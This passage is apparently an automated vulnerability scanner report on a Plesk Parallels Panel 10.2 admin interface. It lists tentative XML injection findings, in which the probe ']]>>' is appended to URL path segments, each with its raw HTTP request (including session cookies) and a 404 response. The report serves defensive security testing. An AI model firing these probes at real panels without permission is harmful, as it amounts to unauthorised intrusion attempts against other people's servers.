Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:20 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.44. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /left.php3

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /left.php3]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: psaContext=dashboard; PHPSESSID=b6e4a9281ca7faad89475e4d77b34296; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:01:36 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.45. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /license.php3

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /license.php3]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:26:15 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.46. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login.php3 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /login.php3

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /login.php3]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:31 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.47. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /login_up.php3

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /login_up.php3]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:24:03 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.48. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/logout.php3 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /logout.php3

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /logout.php3]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.49. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-info/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/admin-info/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /plesk]]>>/admin-info/?context=personal-info HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=tools

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:14:21 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.50. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/schedule/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/schedule/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /plesk]]>>/reseller@3/backup/schedule/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/schedule/
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Content-Type: multipart/form-data; boundary=---------------------------23063167322386
Content-Length: 1954

-----------------------------23063167322386
Content-Disposition: form-data; name="forgery_protection_token"

b7282d2a0991a8873c80d06b804622ce
-----------------------------23063167322386
Content-D
...[SNIP]...

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:49:41 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.51. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/preferences [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/preferences

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /plesk]]>>/reseller@3/preferences?context=interface-pref HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=reseller-tools

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:35:14 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.52. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /plesk]]>>/reseller@3/report/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:40:12 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.53. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/properties/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@2/properties/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /plesk]]>>/reseller@3/report/layout@2/properties/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: reseller_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:42:49 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.54. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:27 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.55. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:29 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.56. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/custom.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/admin/custom.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/css/admin/custom.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:18 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.57. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/custom.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/admin/custom.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/css/admin/custom.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:20 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.58. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/custom.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/admin/custom.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css]]>>/admin/custom.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.59. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/custom.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/admin/custom.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/admin]]>>/custom.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:24 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.60. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/custom.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/admin/custom.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/admin/custom.css]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:26 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.61. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/main.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/admin/main.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/css/admin/main.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:18 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.62. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/main.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/admin/main.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/css/admin/main.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:20 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.63. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/main.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/admin/main.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css]]>>/admin/main.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
